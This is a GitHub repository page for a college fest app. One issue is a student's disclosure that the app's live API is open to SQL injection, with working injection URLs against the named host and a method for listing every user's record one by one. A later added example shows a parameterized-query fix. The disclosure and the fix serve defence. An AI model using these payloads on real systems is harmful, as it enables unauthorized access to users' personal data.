
hillffair2k18's People

Contributors

abhinavlamba, adi23arora, alishanegi98, bharatshah1498, jatin0312, naman99lalit, obiwanrohan, prakhartiwari576, tanvi003, thisisnsh, vishal17599

hillffair2k18's Issues

Part 1 Work

  • @Vishal17599 @naman99lalit make/copy code (not UI) to choose an image from phone gallery and convert to byte array
  • @utkarshsingh99 make sure you keep the endpoints and key values same :)
  • @Alisha1116 @ArjunLuam Try finishing spin wheel by Saturday, no fancy UI just normal implementation. We will see the UI later
  • @tanvi003 coordinate with @Abhinavlamba and just make a basic implementation of Tambola. Again no fancy UI we will see that later this week. Just make a functioning game.
  • @AnshuAkansha choose between spin wheel and Tambola and start working with them.
  • FirstYear make questions first. That is the priority.

Try wrapping this up by Saturday.
Work on separate branches
Don't work on master branch
Don't waste time on UI. We just want implementation

bugs in hillffair2k19 project

sorry for posting it here, it is for the app of latest eir, but you guys removed it so ....
(wise decision btw)

hey! you guys changed the implementation, which might have removed the db wipeout threat and
that's a good thing. I guess you also tweaked the /User handler, but with all respect,
there are still some loopholes and traversing is still possible,
for example this link.

http://api.hillffair.com/User/5'%20OR%201=1%20--'

this statement will give you top row of the table
now you have data of first person
now you need to select everyone else, but the first person

say its firebase_id is 0akwYovxZnf8h6Ja12gj28OzWEr1
now you need to select everybody who is not the first person

http://api.hillffair.com/User/5'%20OR%20(1=1%20AND%20firebase_id%20!=%20%220akwYovxZnf8h6Ja12gj28OzWEr1%22%20%20)%20--'

( 5 ' OR (1=1 AND firebase_id != "0akwYovxZnf8h6Ja12gj28OzWEr1" ))

which is just like adding inner boolean operations
now you have 2 persons' data
now do the same to get the third one, select everybody who is not first and not second

just like that! ezpz.
but later, I found that "/leaderboard" also does the same thing, which gives me the feeling that "content security" is NOT the purpose of the app, and as it is an intercollege project it is not even
necessary (but still I suggest we should try our best to make our product stand out)

still I liked the traversing thingy I made :P (seriously I made it myself), and also plz don't hate me, I'll NOT try to do any unethical thing with the app. app is yours and yours only <3.

tell me if I should delete this or not, or in case you want me to stop interfering with your club's decision!?
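
The fix for the /User lookup described in the report above, as an added example that is not part of the original issue or the project's code: the same lookup written with string concatenation and with a bound parameter, run against the first path segment the report quotes. The table layout, function names and sample rows are assumptions constructed for illustration; the project's real schema and backend language are not shown on the page.

```python
import sqlite3

def make_db():
    # Constructed sample table; the real schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT PRIMARY KEY, firebase_id TEXT, name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "fid-constructed-a", "first"),
         ("2", "fid-constructed-b", "second"),
         ("3", "fid-constructed-c", "third")],
    )
    return db

def get_user_concat(db, user_id):
    # "Before": the URL path segment is pasted into the SQL text, so a quote
    # inside it closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT id, firebase_id, name FROM users WHERE id = '" + user_id + "'"
    return db.execute(sql).fetchone()

def get_user_bound(db, user_id):
    # "After": the SQL text is fixed and the value travels as a bound
    # parameter, so it is only ever compared as data against the id column.
    sql = "SELECT id, firebase_id, name FROM users WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchone()

# URL-decoded form of the first path segment quoted in the report above.
REPORTED_SEGMENT = "5' OR 1=1 --'"

if __name__ == "__main__":
    db = make_db()
    print("concat, reported segment:", get_user_concat(db, REPORTED_SEGMENT))
    print("bound,  reported segment:", get_user_bound(db, REPORTED_SEGMENT))
    print("bound,  id 2:            ", get_user_bound(db, "2"))
```

Binding fixes the query shape only; whether /User and /leaderboard should return other users' rows at all is a separate authorization question that the handler has to answer.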
